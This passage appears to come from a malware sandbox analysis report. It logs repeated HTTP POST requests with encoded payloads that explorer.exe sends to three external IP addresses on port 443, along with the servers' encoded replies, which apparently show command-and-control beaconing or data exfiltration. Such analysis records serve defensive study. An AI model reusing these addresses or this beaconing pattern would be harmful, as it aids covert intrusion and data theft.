AiltXt+OCABq54p0uiGKONyiSEQGmEXB30JgKbhxXvBYZlQQTdAnwbzPcaWEWa44RV1I+ztSn8uNgkWCDL88pN6S7R4DuhFFQqS/kUak0qkaVolDQb5dGeMD7dkojteBiwM9Db0WjWR+8F95rhaMTogmu7un0/MH6Q796M/xSEOYjBsSrzVTreZZRYE1zZcvVN//DPzN67oURe2zXN+nPNES5WTMbjc9ixBOIfZzupNv28+VWyt7Mpw8Pljk5Yo
2024-07-27 05:45:09 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:09 UTC	685	IN	Data Raw: 41 73 70 54 71 50 52 6d 67 41 6b 52 30 34 56 71 66 30 6c 33 77 46 2b 6b 67 58 43 35 78 76 4b 68 54 6a 52 6e 2b 59 62 4c 37 53 6f 74 61 47 32 2f 6d 38 59 49 38 6f 46 4f 44 65 67 64 6c 42 36 4a 51 47 4f 62 33 54 55 55 79 78 2f 43 78 42 68 75 43 31 30 65 67 6e 37 4c 65 6e 74 32 61 71 66 69 34 48 41 6b 50 76 69 56 62 30 54 32 2b 34 74 31 53 32 4d 31 41 69 2b 41 53 5a 44 2f 79 75 6e 54 54 70 4d 41 50 31 44 77 35 32 6c 74 75 4a 55 4f 32 50 45 34 44 4a 61 72 72 31 32 41 62 62 7a 2b 6a 67 32 51 75 2b 4e 36 64 73 74 6d 66 68 5a 61 51 76 50 39 75 57 5a 55 42 33 41 76 58 64 73 75 66 6d 7a 39 71 70 32 34 37 4a 32 4c 55 4b 7a 31 44 64 4d 4b 52 66 33 38 7a 44 69 54 42 58 4a 57 6e 77 68 41 4b 61 43 38 58 76 2f 77 57 35 69 2b 42 63 75 61 7a 73 64 59 4b 36 76 54 47 34 42 Data Ascii: AspTqPRmgAkR04Vqf0l3wF+kgXC5xvKhTjRn+YbL7SotaG2/m8YI8oFODegdlB6JQGOb3TUUyx/CxBhuC10egn7Lent2aqfi4HAkPviVb0T2+4t1S2M1Ai+ASZD/yunTTpMAP1Dw52ltuJUO2PE4DJarr12Abbz+jg2Qu+N6dstmfhZaQvP9uWZUB3AvXdsufmz9qp247J2LUKz1DdMKRf38zDiTBXJWnwhAKaC8Xv/wW5i+BcuazsdYK6vTG4B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	62329	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:10 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:10 UTC	1122	OUT	Data Raw: 66 51 65 48 50 62 56 38 75 73 41 51 4a 46 49 45 5a 37 44 36 77 48 39 66 68 6b 7a 41 73 70 46 63 43 4f 43 55 52 47 50 37 56 76 6e 6c 49 76 39 45 6f 67 75 67 49 2b 5a 59 31 32 51 75 49 69 68 52 74 62 30 45 4a 77 59 56 2f 48 78 79 42 58 64 6c 44 4d 62 59 30 66 78 37 55 56 32 74 37 6b 73 54 73 6b 46 4a 2f 51 34 38 51 6c 4a 67 35 37 4b 66 4a 49 51 6e 6c 55 48 76 6d 52 45 75 35 2f 56 66 6c 34 35 31 43 6f 70 58 30 70 77 72 52 66 44 42 58 36 7a 6a 78 6b 38 41 44 55 51 50 71 74 43 6c 71 75 79 77 63 70 2b 39 4b 64 4f 70 66 55 6a 32 50 79 65 7a 73 66 68 54 4b 62 68 45 4b 6e 6d 47 2f 49 34 69 62 4a 61 50 6d 32 62 7a 39 68 35 4e 50 55 6a 65 6a 45 54 71 63 54 4e 44 71 59 36 73 64 68 4f 55 56 44 50 32 71 63 7a 30 4e 58 42 4a 48 50 56 38 2b 69 31 58 6d 30 79 34 66 50 6e Data Ascii: fQeHPbV8usAQJFIEZ7D6wH9fhkzAspFcCOCURGP7VvnlIv9EogugI+ZY12QuIihRtb0EJwYV/HxyBXdlDMbY0fx7UV2t7ksTskFJ/Q48QlJg57KfJIQnlUHvmREu5/Vfl451CopX0pwrRfDBX6zjxk8ADUQPqtClquywcp+9KdOpfUj2PyezsfhTKbhEKnmG/I4ibJaPm2bz9h5NPUjejETqcTNDqY6sdhOUVDP2qcz0NXBJHPV8+i1Xm0y4fPn
2024-07-27 05:45:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:11 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:12 UTC	685	IN	Data Raw: 42 52 52 39 36 63 6a 6b 69 37 79 6a 75 44 63 71 57 4f 42 51 46 58 55 4d 6f 71 51 6a 37 4c 5a 6f 76 52 70 43 53 34 30 35 51 57 35 56 57 47 67 7a 42 32 46 5a 78 74 71 55 70 70 6d 7a 42 4e 64 69 36 2f 46 50 37 6a 62 6e 54 4b 4f 51 52 58 79 48 59 57 5a 4d 47 62 47 57 65 63 42 32 42 36 43 34 62 4f 54 4b 66 7a 2b 7a 64 64 50 77 58 39 35 6d 77 38 36 4e 56 50 54 7a 62 63 6b 59 30 52 4f 66 68 79 31 74 41 34 38 4c 70 4b 37 50 69 79 77 73 6a 72 55 6e 57 2b 65 6b 59 6c 6a 43 4d 43 67 54 30 58 75 63 70 71 51 57 54 70 75 66 4e 2b 32 38 53 69 4c 36 52 63 31 44 53 79 52 38 71 36 41 4e 4d 32 4b 64 62 6f 43 62 35 4c 4c 2b 66 73 72 37 72 74 44 4a 51 61 49 6f 59 32 56 4a 36 43 4e 36 67 56 38 6f 55 71 53 75 41 55 4b 74 54 75 56 6b 53 2b 45 41 48 62 6f 6c 75 44 46 41 67 47 6f Data Ascii: BRR96cjki7yjuDcqWOBQFXUMoqQj7LZovRpCS405QW5VWGgzB2FZxtqUppmzBNdi6/FP7jbnTKOQRXyHYWZMGbGWecB2B6C4bOTKfz+zddPwX95mw86NVPTzbckY0ROfhy1tA48LpK7PiywsjrUnW+ekYljCMCgT0XucpqQWTpufN+28SiL6Rc1DSyR8q6ANM2KdboCb5LL+fsr7rtDJQaIoY2VJ6CN6gV8oUqSuAUKtTuVkS+EAHboluDFAgGo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	62332	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:13 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:13 UTC	1122	OUT	Data Raw: 48 62 41 64 5a 4e 49 46 36 39 4a 4f 57 64 44 6d 53 69 47 6f 45 42 33 2b 58 76 47 6f 50 2b 6d 32 57 64 4b 6e 39 6e 30 59 69 74 5a 2f 38 33 47 2f 62 56 58 71 6f 33 45 69 35 59 67 2b 55 31 46 4b 50 37 6c 4c 33 37 61 6b 4b 62 62 56 46 5a 41 34 62 66 34 48 78 46 54 2b 57 57 69 61 58 36 61 61 61 32 4b 4c 46 6f 6e 38 50 77 46 2b 48 38 75 2b 61 79 4d 46 4c 62 31 51 4e 4d 32 72 67 32 38 46 35 4b 49 53 6d 74 4d 5a 72 39 45 71 46 78 33 32 78 50 6e 68 62 74 4e 6d 4f 6a 37 41 46 51 64 41 63 65 68 36 38 70 74 54 4c 61 6f 77 6c 51 4e 32 48 68 39 63 6a 5a 70 54 77 66 48 49 67 4b 74 53 58 64 2b 73 77 37 57 30 2f 6b 45 58 5a 6f 47 43 7a 79 73 75 58 38 42 72 38 56 48 6a 50 37 79 61 39 46 35 46 68 44 6d 65 43 48 46 4c 67 6b 53 74 5a 6e 71 61 6b 62 4b 4b 73 32 73 30 4c 73 45 Data Ascii: HbAdZNIF69JOWdDmSiGoEB3+XvGoP+m2WdKn9n0YitZ/83G/bVXqo3Ei5Yg+U1FKP7lL37akKbbVFZA4bf4HxFT+WWiaX6aaa2KLFon8PwF+H8u+ayMFLb1QNM2rg28F5KISmtMZr9EqFx32xPnhbtNmOj7AFQdAceh68ptTLaowlQN2Hh9cjZpTwfHIgKtSXd+sw7W0/kEXZoGCzysuX8Br8VHjP7ya9F5FhDmeCHFLgkStZnqakbKKs2s0LsE
2024-07-27 05:45:15 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:15 UTC	685	IN	Data Raw: 66 4f 5a 65 46 67 38 6b 50 66 79 46 65 43 79 65 30 46 79 57 56 77 50 64 42 75 4a 55 79 48 68 4e 5a 58 52 6b 44 39 4d 42 33 5a 54 53 77 31 74 39 45 6d 47 61 53 45 55 38 58 2f 52 6f 4e 31 34 45 57 49 57 30 6a 65 30 56 64 66 6b 62 58 6e 62 31 65 68 76 32 45 6b 65 49 65 70 41 30 4e 6f 2f 35 59 4e 69 49 51 71 79 31 43 54 64 74 66 37 4a 6c 6f 56 63 34 53 42 67 56 51 6d 4e 56 32 78 4c 51 4d 4b 54 73 41 46 67 77 54 6b 4c 52 31 70 57 5a 41 43 56 47 31 35 68 52 61 72 75 39 68 6b 38 61 49 6d 4e 33 79 7a 66 44 45 34 67 35 63 62 30 67 2b 34 64 31 33 46 6a 62 2b 44 70 59 64 67 76 7a 2f 58 44 66 68 37 74 34 43 77 6c 48 70 48 58 66 41 54 42 53 45 5a 6f 70 5a 63 6b 6d 50 6d 5a 30 79 66 65 4b 30 47 6b 49 45 31 6e 71 67 4a 73 41 39 64 58 69 67 51 72 77 52 74 68 37 37 77 36 Data Ascii: fOZeFg8kPfyFeCye0FyWVwPdBuJUyHhNZXRkD9MB3ZTSw1t9EmGaSEU8X/RoN14EWIW0je0VdfkbXnb1ehv2EkeIepA0No/5YNiIQqy1CTdtf7JloVc4SBgVQmNV2xLQMKTsAFgwTkLR1pWZACVG15hRaru9hk8aImN3yzfDE4g5cb0g+4d13Fjb+DpYdgvz/XDfh7t4CwlHpHXfATBSEZopZckmPmZ0yfeK0GkIE1nqgJsA9dXigQrwRth77w6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	62335	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:15 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:15 UTC	1122	OUT	Data Raw: 69 6a 2b 6a 65 76 47 39 34 30 58 33 32 78 74 56 65 30 6a 42 64 61 74 4a 36 38 6d 4d 4d 62 75 4a 4f 72 38 50 6a 4e 47 67 6e 42 45 53 6f 63 52 63 4a 59 36 5a 4a 36 61 6f 74 53 4c 31 65 6c 4d 44 65 64 63 68 5a 74 39 4b 2f 32 41 38 4a 44 53 7a 44 52 6c 69 2b 72 71 6f 49 57 45 6a 43 34 78 38 32 7a 7a 52 77 54 36 30 75 62 76 4f 51 72 61 75 68 44 33 66 35 34 58 63 79 4d 70 65 33 52 39 79 33 37 41 70 5a 58 50 59 56 71 7a 53 41 78 65 71 30 77 52 69 52 38 78 56 70 43 34 43 6b 2f 6d 73 47 72 6c 76 32 6c 6d 2b 35 52 63 75 51 5a 63 48 43 37 6d 43 6e 49 4d 66 2f 74 30 72 47 2b 52 6a 66 51 71 79 6d 39 31 67 71 33 79 50 30 54 4d 69 78 6f 44 38 47 56 6e 63 2f 4d 35 78 54 59 4f 31 71 46 34 4e 38 78 57 59 38 68 4c 48 69 56 4f 55 6a 48 65 53 35 52 6c 66 6f 66 79 73 30 6e 6b Data Ascii: ij+jevG940X32xtVe0jBdatJ68mMMbuJOr8PjNGgnBESocRcJY6ZJ6aotSL1elMDedchZt9K/2A8JDSzDRli+rqoIWEjC4x82zzRwT60ubvOQrauhD3f54XcyMpe3R9y37ApZXPYVqzSAxeq0wRiR8xVpC4Ck/msGrlv2lm+5RcuQZcHC7mCnIMf/t0rG+RjfQqym91gq3yP0TMixoD8GVnc/M5xTYO1qF4N8xWY8hLHiVOUjHeS5Rlfofys0nk
2024-07-27 05:45:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:16 UTC	685	IN	Data Raw: 51 61 2b 7a 7a 51 31 46 4f 71 54 42 2b 67 35 65 46 77 39 74 6a 65 39 4c 37 71 79 53 6d 63 49 4b 77 4c 6e 43 32 61 4c 65 65 4f 79 2f 62 2b 42 78 41 6b 6e 65 47 64 31 6b 57 33 35 36 6a 42 66 41 4a 61 65 65 53 76 34 5a 48 44 56 66 53 49 6a 65 75 52 6f 61 77 6c 32 5a 55 72 6b 63 4e 4b 6a 56 70 56 49 36 43 38 75 6d 73 65 64 54 77 69 4f 30 66 6c 73 4e 37 33 2b 4d 77 6a 5a 56 71 51 73 4a 38 74 54 73 68 72 6b 67 69 6f 42 55 46 35 61 57 43 4a 42 55 5a 56 37 2b 47 52 65 2f 6c 55 63 53 35 53 31 6c 32 43 64 64 4e 31 36 6f 4a 6c 78 59 70 47 6f 51 77 6c 50 56 63 63 55 57 57 72 35 74 49 48 42 33 73 42 61 50 78 4a 71 4e 67 57 30 48 42 37 2b 31 5a 4f 77 61 46 43 39 7a 77 57 58 4d 2b 77 38 64 2f 69 52 43 54 35 54 75 56 41 38 64 62 57 64 62 32 54 4b 58 64 58 6a 4b 6e 73 6e Data Ascii: Qa+zzQ1FOqTB+g5eFw9tje9L7qySmcIKwLnC2aLeeOy/b+BxAkneGd1kW356jBfAJaeeSv4ZHDVfSIjeuRoawl2ZUrkcNKjVpVI6C8umsedTwiO0flsN73+MwjZVqQsJ8tTshrkgioBUF5aWCJBUZV7+GRe/lUcS5S1l2CddN16oJlxYpGoQwlPVccUWWr5tIHB3sBaPxJqNgW0HB7+1ZOwaFC9zwWXM+w8d/iRCT5TuVA8dbWdb2TKXdXjKnsn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	62337	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:17 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:17 UTC	1122	OUT	Data Raw: 42 33 35 33 53 30 77 6e 66 56 36 5a 70 67 7a 64 30 77 66 38 49 52 4f 75 30 55 42 76 39 41 53 65 63 37 36 4a 73 59 66 4f 4a 6c 6a 6d 44 6d 74 75 35 52 36 67 30 6d 63 79 52 70 73 56 4e 30 5a 32 66 74 44 32 31 65 39 5a 4e 5a 4e 73 7a 64 4a 2f 31 74 62 31 79 72 44 55 58 4a 50 7a 43 4a 45 77 67 62 43 6f 47 38 47 41 59 6d 30 65 4f 65 41 4d 66 2f 30 42 2f 71 43 6e 4d 54 75 44 2b 62 7a 34 50 76 63 45 57 43 6e 56 54 79 78 36 6b 49 56 64 2b 32 30 50 74 32 5a 6a 45 52 54 6a 6f 69 52 65 7a 62 71 50 65 6f 46 56 38 4d 38 4c 77 33 44 37 79 6c 52 34 4d 43 42 4c 54 45 56 5a 52 41 6f 6a 45 4b 41 69 53 4e 4d 37 72 47 75 70 37 6f 34 32 45 2b 72 47 50 6b 63 5a 54 30 4d 71 69 37 64 53 59 39 6e 70 42 36 41 32 67 7a 42 61 37 31 49 6b 4f 2f 76 39 78 7a 36 41 47 33 45 62 35 4d 4b Data Ascii: B353S0wnfV6Zpgzd0wf8IROu0UBv9ASec76JsYfOJljmDmtu5R6g0mcyRpsVN0Z2ftD21e9ZNZNszdJ/1tb1yrDUXJPzCJEwgbCoG8GAYm0eOeAMf/0B/qCnMTuD+bz4PvcEWCnVTyx6kIVd+20Pt2ZjERTjoiRezbqPeoFV8M8Lw3D7ylR4MCBLTEVZRAojEKAiSNM7rGup7o42E+rGPkcZT0Mqi7dSY9npB6A2gzBa71IkO/v9xz6AG3Eb5MK
2024-07-27 05:45:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:18 UTC	685	IN	Data Raw: 68 6c 6e 78 6a 6e 62 69 32 71 7a 50 50 51 58 5a 6f 70 52 67 47 63 70 73 57 30 6f 34 45 54 2b 41 51 55 78 43 48 65 76 56 78 73 2f 6d 74 4f 4b 5a 6a 2b 38 71 6b 36 37 76 41 64 4e 31 35 46 57 30 65 50 64 39 75 44 38 32 73 67 45 4c 41 7a 66 76 4d 48 62 58 41 68 75 47 66 44 2f 30 67 49 30 39 36 2f 41 43 44 47 42 73 31 6e 36 51 59 75 46 32 58 61 58 37 44 67 78 66 2b 79 73 39 4c 52 77 50 32 7a 67 69 42 53 58 44 46 35 54 70 48 44 39 54 71 62 30 68 64 4e 7a 33 6a 61 65 58 66 6c 6b 63 39 32 32 57 61 79 43 38 48 45 6c 48 77 69 4e 34 4b 4e 58 66 59 67 2f 6f 4d 43 64 4c 6e 36 2f 34 4b 37 67 48 31 76 41 48 43 6c 4d 73 45 31 44 31 4f 35 36 34 52 71 70 5a 34 61 51 65 41 54 55 7a 4f 6e 4a 43 42 2b 2b 44 41 55 64 58 36 45 36 67 68 44 4d 4b 2f 75 73 32 72 56 66 59 5a 71 71 Data Ascii: hlnxjnbi2qzPPQXZopRgGcpsW0o4ET+AQUxCHevVxs/mtOKZj+8qk67vAdN15FW0ePd9uD82sgELAzfvMHbXAhuGfD/0gI096/ACDGBs1n6QYuF2XaX7Dgxf+ys9LRwP2zgiBSXDF5TpHD9Tqb0hdNz3jaeXflkc922WayC8HElHwiN4KNXfYg/oMCdLn6/4K7gH1vAHClMsE1D1O564RqpZ4aQeATUzOnJCB++DAUdX6E6ghDMK/us2rVfYZqq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	62339	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:19 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:19 UTC	1122	OUT	Data Raw: 42 39 38 46 78 4d 57 44 4d 37 54 39 6e 4b 36 53 53 51 63 62 53 6c 63 6f 43 79 6c 64 57 74 70 69 30 32 45 72 30 6f 6f 33 64 6c 36 79 68 30 76 55 56 69 67 39 62 4b 53 2f 58 7a 63 4b 44 6e 46 73 2b 6b 66 32 64 31 52 4b 76 70 4f 55 39 76 69 65 68 5a 38 75 2b 4b 2b 51 6c 4f 36 41 31 45 4f 69 69 49 77 5a 37 30 6c 73 67 4a 55 56 75 41 47 4c 4f 65 6d 65 51 41 42 46 6a 76 6d 79 30 72 4b 31 35 2f 6a 52 72 44 55 69 43 71 65 57 70 4d 67 31 36 2b 78 47 66 35 30 4e 65 42 70 66 72 6b 53 45 43 36 53 58 57 65 5a 41 4a 61 35 7a 51 52 68 48 45 65 35 34 65 48 68 30 7a 43 78 4f 4e 65 44 72 31 4c 63 42 34 2b 70 65 74 79 46 32 34 63 55 39 4f 4e 78 58 4d 63 37 62 51 70 47 48 48 57 32 5a 77 54 50 71 33 2f 70 2b 6b 51 5a 52 78 5a 47 71 4a 55 62 4a 71 5a 73 38 39 45 2f 4d 73 41 65 Data Ascii: B98FxMWDM7T9nK6SSQcbSlcoCyldWtpi02Er0oo3dl6yh0vUVig9bKS/XzcKDnFs+kf2d1RKvpOU9viehZ8u+K+QlO6A1EOiiIwZ70lsgJUVuAGLOemeQABFjvmy0rK15/jRrDUiCqeWpMg16+xGf50NeBpfrkSEC6SXWeZAJa5zQRhHEe54eHh0zCxONeDr1LcB4+petyF24cU9ONxXMc7bQpGHHW2ZwTPq3/p+kQZRxZGqJUbJqZs89E/MsAe
2024-07-27 05:45:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:20 UTC	685	IN	Data Raw: 62 4e 48 41 74 37 32 6c 4e 57 2f 47 5a 41 6f 6d 39 70 4b 52 6e 36 72 79 61 34 77 4a 54 6a 4b 78 73 41 4c 6e 4d 6c 6e 41 46 34 4d 31 47 46 36 43 4a 42 43 48 56 35 57 75 44 43 4a 61 5a 4e 6a 33 54 73 49 31 43 31 55 4d 6f 72 68 57 62 6e 6e 78 6c 6c 43 6a 43 62 64 31 6d 61 6a 59 39 76 32 4f 63 51 51 42 5a 33 48 6a 55 4a 48 34 36 79 77 46 34 4c 31 39 61 44 35 6c 49 4c 47 32 56 4b 34 50 79 68 66 4b 71 52 69 5a 38 71 70 73 67 36 45 72 59 33 4c 76 65 6a 6b 58 74 72 58 61 59 55 4b 67 6c 4d 34 49 53 5a 7a 61 62 62 49 53 78 55 68 63 4a 54 38 36 49 49 7a 7a 47 4c 6a 4e 49 77 66 72 33 51 37 69 39 52 34 77 6d 53 2b 4d 38 57 32 32 6f 67 7a 33 30 4a 6c 38 45 67 64 33 68 46 4d 48 47 6a 2f 39 34 77 4d 67 2b 54 6c 7a 6d 34 69 34 7a 51 42 32 68 4c 35 45 6c 41 7a 63 65 64 50 Data Ascii: bNHAt72lNW/GZAom9pKRn6rya4wJTjKxsALnMlnAF4M1GF6CJBCHV5WuDCJaZNj3TsI1C1UMorhWbnnxllCjCbd1majY9v2OcQQBZ3HjUJH46ywF4L19aD5lILG2VK4PyhfKqRiZ8qpsg6ErY3LvejkXtrXaYUKglM4ISZzabbISxUhcJT86IIzzGLjNIwfr3Q7i9R4wmS+M8W22ogz30Jl8Egd3hFMHGj/94wMg+Tlzm4i4zQB2hL5ElAzcedP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	62340	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:21 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:21 UTC	1122	OUT	Data Raw: 47 4e 6c 59 65 33 71 6b 52 33 74 75 38 4d 55 57 41 76 54 37 54 42 45 71 64 79 34 6a 56 4b 41 4b 78 62 78 56 44 2f 46 4f 4d 51 64 64 43 43 74 44 58 72 2b 6e 53 30 4e 73 68 72 69 30 64 6c 36 58 49 4e 50 54 47 43 74 4f 44 35 74 55 52 4d 42 45 72 6d 38 54 59 6c 76 30 75 30 75 62 4a 6b 6b 4d 57 74 4c 31 38 4e 4b 73 56 35 69 52 30 69 32 31 79 30 4b 31 56 73 59 36 6b 6d 70 78 4f 79 76 73 46 36 51 6f 7a 38 6e 32 73 56 76 43 68 58 7a 4d 30 68 6e 48 41 31 46 4c 30 38 48 47 4e 54 76 47 57 77 33 35 6e 7a 77 34 4c 66 46 67 2f 76 56 61 69 6e 34 6f 56 67 57 43 73 35 51 6c 58 63 38 7a 37 47 48 4d 6e 46 46 79 5a 45 70 50 75 6f 6f 4c 75 50 74 73 76 6e 69 31 30 4e 59 31 74 4c 2f 2b 50 77 54 31 64 6e 61 4a 76 33 76 46 65 36 48 62 6a 44 72 75 64 34 4a 30 78 49 52 31 73 2f 66 Data Ascii: GNlYe3qkR3tu8MUWAvT7TBEqdy4jVKAKxbxVD/FOMQddCCtDXr+nS0Nshri0dl6XINPTGCtOD5tURMBErm8TYlv0u0ubJkkMWtL18NKsV5iR0i21y0K1VsY6kmpxOyvsF6Qoz8n2sVvChXzM0hnHA1FL08HGNTvGWw35nzw4LfFg/vVain4oVgWCs5QlXc8z7GHMnFFyZEpPuooLuPtsvni10NY1tL/+PwT1dnaJv3vFe6HbjDrud4J0xIR1s/f
2024-07-27 05:45:23 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:23 UTC	685	IN	Data Raw: 62 4d 59 36 38 53 77 72 36 44 79 31 6e 45 44 36 47 51 59 48 41 77 53 4d 30 31 73 5a 54 6f 74 57 54 51 31 4b 45 30 75 6d 55 50 77 63 71 41 47 4b 76 70 4a 65 4d 78 54 31 74 55 6b 32 56 72 49 7a 68 56 4f 4e 50 4a 69 49 30 38 52 54 64 65 30 45 45 56 38 7a 6c 7a 75 66 46 5a 6b 51 78 34 6b 50 57 70 76 61 7a 37 62 6c 54 47 35 41 43 70 4d 5a 79 31 79 54 43 70 6b 4c 69 74 51 72 75 43 69 38 4c 31 51 7a 47 66 6d 34 6d 68 41 57 54 45 50 65 37 69 6c 5a 6f 37 31 79 6c 69 7a 76 61 57 62 66 70 68 62 58 58 39 55 32 51 4b 57 45 4e 63 4b 56 37 4f 64 2f 58 4e 62 6e 74 4a 41 67 48 45 67 50 62 72 72 45 4e 72 47 4a 73 73 76 33 5a 72 4d 44 55 37 76 53 58 5a 44 6d 55 2b 75 6f 56 54 41 69 57 72 55 39 45 45 33 68 43 59 30 79 4b 68 5a 71 5a 59 58 63 5a 45 67 4c 6c 33 70 71 38 56 2f Data Ascii: bMY68Swr6Dy1nED6GQYHAwSM01sZTotWTQ1KE0umUPwcqAGKvpJeMxT1tUk2VrIzhVONPJiI08RTde0EEV8zlzufFZkQx4kPWpvaz7blTG5ACpMZy1yTCpkLitQruCi8L1QzGfm4mhAWTEPe7ilZo71ylizvaWbfphbXX9U2QKWENcKV7Od/XNbntJAgHEgPbrrENrGJssv3ZrMDU7vSXZDmU+uoVTAiWrU9EE3hCY0yKhZqZYXcZEgLl3pq8V/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	62341	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:24 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:24 UTC	1122	OUT	Data Raw: 44 54 45 62 71 67 39 37 36 76 36 6c 57 68 4c 48 4f 61 45 4e 79 62 43 52 64 38 56 47 70 4f 66 41 4a 43 6d 41 49 4b 7a 34 67 56 75 53 54 47 70 68 4b 5a 61 4d 74 44 65 39 62 2f 73 52 4e 34 77 6f 54 54 56 4c 78 34 52 68 30 30 33 6f 2b 39 70 6f 39 35 48 6e 52 4e 64 69 78 54 65 4a 37 77 6f 31 4e 70 56 5a 36 2b 73 67 2b 46 50 35 79 62 64 48 64 58 4b 55 4f 36 6f 35 64 55 4c 6a 54 39 6b 31 56 43 33 78 4f 78 4d 55 41 51 67 30 63 78 4b 30 64 77 64 41 4f 65 33 6d 6a 73 4d 72 4a 4a 2f 59 41 43 38 2b 64 47 51 58 51 55 48 59 63 44 35 31 37 2f 65 54 30 42 6b 63 79 30 53 35 67 72 78 6b 4c 47 4a 69 72 37 64 70 64 50 42 35 66 45 73 30 70 2f 53 5a 56 36 54 6e 34 65 64 75 65 42 6f 47 70 4b 62 47 50 78 42 66 49 4b 50 54 58 37 37 35 46 2f 48 48 44 4f 37 78 41 4c 6f 33 2b 6f 45 Data Ascii: DTEbqg976v6lWhLHOaENybCRd8VGpOfAJCmAIKz4gVuSTGphKZaMtDe9b/sRN4woTTVLx4Rh003o+9po95HnRNdixTeJ7wo1NpVZ6+sg+FP5ybdHdXKUO6o5dULjT9k1VC3xOxMUAQg0cxK0dwdAOe3mjsMrJJ/YAC8+dGQXQUHYcD517/eT0Bkcy0S5grxkLGJir7dpdPB5fEs0p/SZV6Tn4edueBoGpKbGPxBfIKPTX775F/HHDO7xALo3+oE
2024-07-27 05:45:25 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:25 GMT Content-Type: text/plain; charset=utf-8 Connection: close
